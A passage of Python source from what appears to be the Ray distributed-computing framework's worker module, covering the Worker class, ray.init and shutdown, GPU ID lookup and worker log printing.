from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized, _initialize_internal_kv, \
_internal_kv_reset
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return self.core_worker.get_current_runtime_env()
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address),
# If the owner address is set, then the initial reference is
# already acquired internally in CoreWorker::CreateOwned.
# TODO(ekl) we should unify the code path more with the others
# to avoid this special case.
skip_adding_local_ref=(owner_address is not None))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = ray_constants.LOGGER_LEVEL,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address, _deprecation_warn_enabled=False)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if RAY_JOB_CONFIG_JSON_ENV_VAR in os.environ:
if runtime_env:
logger.warning(
"Both RAY_JOB_CONFIG_JSON_ENV_VAR and ray.init(runtime_env) "
"are provided, only using JSON_ENV_VAR to construct "
"job_config. Please ensure no runtime_env is used in driver "
"script's ray.init() when using job submission API.")
# Set runtime_env in job_config if passed as env variable, such as
# ray job submission with driver script executed in subprocess
job_config_json = json.loads(
os.environ.get(RAY_JOB_CONFIG_JSON_ENV_VAR))
job_config = ray.job_config.JobConfig.from_json(job_config_json)
# RAY_JOB_CONFIG_JSON_ENV_VAR is only set at ray job manager level and has
# higher priority in case user also provided runtime_env for ray.init()
elif runtime_env:
# Set runtime_env in job_config if passed in as part of ray.init()
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# disconnect internal kv
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
_internal_kv_reset()
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
